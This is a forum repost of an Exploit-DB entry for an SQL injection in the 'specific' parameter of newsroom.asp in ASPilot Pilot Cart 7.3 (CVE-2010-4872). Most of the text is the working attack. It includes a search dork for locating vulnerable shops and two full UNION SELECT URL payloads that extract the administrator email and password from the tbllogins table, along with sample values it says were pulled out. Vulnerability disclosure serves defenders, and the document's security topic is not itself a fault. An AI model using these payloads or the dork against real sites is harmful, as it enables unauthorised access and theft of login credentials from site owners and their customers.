Exploit ASPilot Pilot Cart 7.3 - 'newsroom.asp' SQL Injection

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
15497
Проверка EDB
  1. Пройдено
Автор
DAIKIN
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
cve-2010-4872
Дата публикации
2010-11-12
Код:
# Title: [ASPilot Pilot Cart 7.3 SQL Injection]
# Date: [12.11.2010]
# Author: [Daikin]
# Software Link: [http://www.pilotcart.com]
# Version: [7.3] maybe also lower
 
Vendor's Description of Software and demo:
# http://www.pilotcart.com
 
Dork:
# Powered by Pilot Cart V.7.3
 
Application Info:
# Name: Pilot Cart
# version last 7.3
 
Vulnerability Info:
# Type: SQL injection
# Discover 8/11/2010
 

#Vuln description:
Input passed via the "specific" parameter to newsroom.asp is not properly
sanitised before being used in a SQL query.

http://server/newsroom.asp?specific=[injection]

#Proof

http://server/newsroom.asp?specific=1

DB: MSAccess

http://server/newsroom.asp?specific=-1%20UNION%20ALL%20SELECT%20null,(select%20top%201%20chr(126)%2bchr(39)%2bcstr(email)%2bchr(39)%2bchr(126)%20from%20(select%20top%201%20*%20from%20(select%20top%201%20*%20from%20tbllogins%20order%20by%201)%20t%20order%20by%201%20desc)t),null,null,null,null,null%20from%20tbllogins
-->mail field "scarab"

http://server/newsroom.asp?specific=-1%20UNION%20ALL%20SELECT%20null,(select%20top%201%20chr(126)%2bchr(39)%2bcstr(pword)%2bchr(39)%2bchr(126)%20from%20(select%20top%201%20*%20from%20(select%20top%201%20*%20from%20tbllogins%20order%20by%201)%20t%20order%20by%201%20desc)t),null,null,null,null,null%20from%20tbllogins
-->pass field "R1ckr011"

#
Credit:
Daikin 

[email protected]
 
Источник
www.exploit-db.com

Похожие темы